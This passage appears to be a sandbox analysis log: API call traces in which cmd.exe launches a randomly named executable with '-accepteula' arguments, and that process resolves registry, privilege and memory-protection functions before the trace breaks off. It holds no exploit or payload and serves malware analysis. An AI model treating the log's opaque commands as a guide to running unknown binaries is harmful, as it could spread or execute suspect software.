[0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0231.102] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0231.103] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0231.104] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0231.105] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0231.105] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0231.105] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0231.105] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0231.105] GetProcessHeap () returned 0x3d0000 [0231.105] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e24b0 [0231.105] GetProcessHeap () returned 0x3d0000 [0231.105] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x76) returned 0x3e8fd8 [0231.105] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0231.106] GetProcessHeap () returned 0x3d0000 [0231.106] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x418) returned 0x3e26c8 [0231.106] SetErrorMode (uMode=0x0) returned 0x0 [0231.106] SetErrorMode (uMode=0x1) returned 0x0 [0231.106] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e26d0, lpFilePart=0x39eef0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39eef0*="Desktop") returned 0x25 [0231.106] SetErrorMode (uMode=0x0) returned 0x1 [0231.106] GetProcessHeap () returned 0x3d0000 [0231.106] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e26c8, Size=0x6e) returned 0x3e26c8 [0231.106] GetProcessHeap () returned 0x3d0000 [0231.106] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e26c8) returned 0x6e [0231.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.106] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.106] GetProcessHeap () returned 0x3d0000 [0231.106] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x120) returned 0x3e2740 [0231.106] GetProcessHeap () returned 0x3d0000 [0231.106] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x238) returned 0x3e2868 [0231.116] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.116] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x39ec8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ec8c) returned 0x3e2a18 [0231.116] GetProcessHeap () returned 0x3d0000 [0231.116] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x14) returned 0x3e2a58 [0231.116] FindClose (in: hFindFile=0x3e2a18 | out: hFindFile=0x3e2a18) returned 1 [0231.117] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0231.117] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0231.117] GetConsoleTitleW (in: lpConsoleTitle=0x39f164, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.117] InitializeProcThreadAttributeList (in: lpAttributeList=0x39efec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x39f0b4 | out: lpAttributeList=0x39efec, lpSize=0x39f0b4) returned 1 [0231.117] UpdateProcThreadAttribute (in: lpAttributeList=0x39efec, dwFlags=0x0, Attribute=0x60001, lpValue=0x39f0ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x39efec, lpPreviousValue=0x0) returned 1 [0231.117] GetStartupInfoW (in: lpStartupInfo=0x39efa8 | out: lpStartupInfo=0x39efa8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0231.117] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0231.118] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x39f048*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f094 | out: lpCommandLine="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner", lpProcessInformation=0x39f094*(hProcess=0x78, hThread=0x74, dwProcessId=0xb54, dwThreadId=0x6a0)) returned 1 [0231.130] CloseHandle (hObject=0x74) returned 1 [0231.130] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0231.131] GetProcessHeap () returned 0x3d0000 [0231.131] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2d90 | out: hHeap=0x3d0000) returned 1 [0231.131] GetEnvironmentStringsW () returned 0x3e2cb8* [0231.131] GetProcessHeap () returned 0x3d0000 [0231.131] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3eaf40 [0231.131] FreeEnvironmentStringsW (penv=0x3e2cb8) returned 1 [0231.131] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0233.640] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x39ef88 | out: lpExitCode=0x39ef88*=0x1) returned 1 [0233.640] CloseHandle (hObject=0x78) returned 1 [0233.640] _vsnwprintf (in: _Buffer=0x39f0d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x39ef94 | out: _Buffer="00000001") returned 8 [0233.640] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0233.640] GetProcessHeap () returned 0x3d0000 [0233.640] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaf40 | out: hHeap=0x3d0000) returned 1 [0233.640] GetEnvironmentStringsW () returned 0x3e2cb8* [0233.641] GetProcessHeap () returned 0x3d0000 [0233.641] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3eaf40 [0233.641] FreeEnvironmentStringsW (penv=0x3e2cb8) returned 1 [0233.641] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.641] GetProcessHeap () returned 0x3d0000 [0233.641] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaf40 | out: hHeap=0x3d0000) returned 1 [0233.641] GetEnvironmentStringsW () returned 0x3e2cb8* [0233.641] GetProcessHeap () returned 0x3d0000 [0233.641] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3eaf40 [0233.641] FreeEnvironmentStringsW (penv=0x3e2cb8) returned 1 [0233.641] GetProcessHeap () returned 0x3d0000 [0233.641] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e00d8 | out: hHeap=0x3d0000) returned 1 [0233.641] DeleteProcThreadAttributeList (in: lpAttributeList=0x39efec | out: lpAttributeList=0x39efec) [0233.641] _get_osfhandle (_FileHandle=1) returned 0x80 [0233.641] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0233.642] _get_osfhandle (_FileHandle=1) returned 0x80 [0233.642] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0233.642] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.642] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0233.642] SetConsoleInputExeNameW () returned 0x1 [0233.642] GetConsoleOutputCP () returned 0x1b5 [0233.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0233.643] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.643] exit (_Code=1) Process: id = "241" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1817f000" os_pid = "0x120" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "186" os_parent_pid = "0xaec" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 839 os_tid = 0xb08 [0231.946] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0231.947] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0231.948] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0231.949] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0231.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0231.951] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0231.952] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0231.953] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0231.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0231.954] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0231.954] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0231.954] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0231.954] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0232.449] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0232.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0232.451] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0232.451] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0232.451] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0232.451] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0232.451] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0232.451] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0232.451] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0232.451] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0232.451] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0232.451] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0232.451] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0232.452] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0232.452] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0232.452] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0232.452] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0232.452] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0232.453] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0232.453] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0232.453] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0232.453] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0232.453] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0232.453] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0232.453] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0232.453] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0232.453] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0232.453] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0232.454] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0232.454] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0232.454] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0232.454] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0232.454] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0232.454] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0232.454] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0232.455] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0232.455] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0232.455] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0232.456] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0232.456] GetSystemTimeAsFileTime (in: 